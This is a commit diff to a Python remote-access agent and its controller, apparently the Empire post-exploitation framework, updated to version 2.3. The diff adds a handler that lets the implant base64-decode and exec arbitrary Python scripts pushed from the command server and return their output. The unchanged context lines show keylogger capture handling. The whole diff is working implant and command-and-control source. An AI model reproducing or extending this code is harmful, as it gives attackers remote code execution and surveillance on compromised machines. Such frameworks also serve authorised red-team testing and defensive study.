Fixed pythonscript command in python agent

2017-11-26 22:42:01 -05:00 · 2017-11-26 22:42:01 -05:00 · 8627462394
parent d88e4b7046
commit 8627462394
3 changed files with 45 additions and 27 deletions
--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@ -418,6 +418,21 @@ def process_packet(packetType, data, resultID):
        # TODO: implement job structure
        pass

+    elif packetType == 121:
+        #base64 decode the script and execute
+        script = base64.b64decode(data)
+        try:
+            buffer = StringIO()
+            sys.stdout = buffer
+            code_obj = compile(script, '<string>', 'exec')
+            exec code_obj in globals()
+            sys.stdout = sys.__stdout__
+            result = str(buffer.getvalue())
+            return build_response_packet(121, result, resultID)
+        except Exception as e:
+            errorData = str(buffer.getvalue())
+            return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)
+
    elif packetType == 122:
        #base64 decode and decompress the data
        try:
--- a/lib/common/agents.py
+++ b/lib/common/agents.py
@ -1729,6 +1729,7 @@ class Agents:
                if not os.path.abspath(savePath).startswith(safePath):
                    dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents')
                    return
+
                with open(savePath,"a+") as f:
                    new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
                    f.write(new_results)
@ -1802,6 +1803,7 @@ class Agents:
            self.save_agent_log(sessionID, data)

        elif responseName == "TASK_SCRIPT_COMMAND":
+            
            self.update_agent_results_db(sessionID, data)
            # update the agent log
            self.save_agent_log(sessionID, data)
--- a/lib/common/empire.py
+++ b/lib/common/empire.py
@ -9,7 +9,7 @@ menu loops.
 """

 # make version for Empire
-VERSION = "2.2"
+VERSION = "2.3"

 from pydispatch import dispatcher

@ -23,6 +23,7 @@ import fnmatch
 import shlex
 import pkgutil
 import importlib
+import base64

 # Empire imports
 import helpers
@ -2641,10 +2642,10 @@ class PythonAgentMenu(SubMenu):
            open_file.close()
            script = script.replace('\r\n', '\n')
            script = script.replace('\r', '\n')
-
+            encScript = base64.b64encode(script)
            msg = "[*] Tasked agent to execute python script: "+filename
            print helpers.color(msg, color="green")
-            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", script)
+            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", encScript)
            #update the agent log
            self.mainMenu.agents.save_agent_log(self.sessionID, msg)
        else: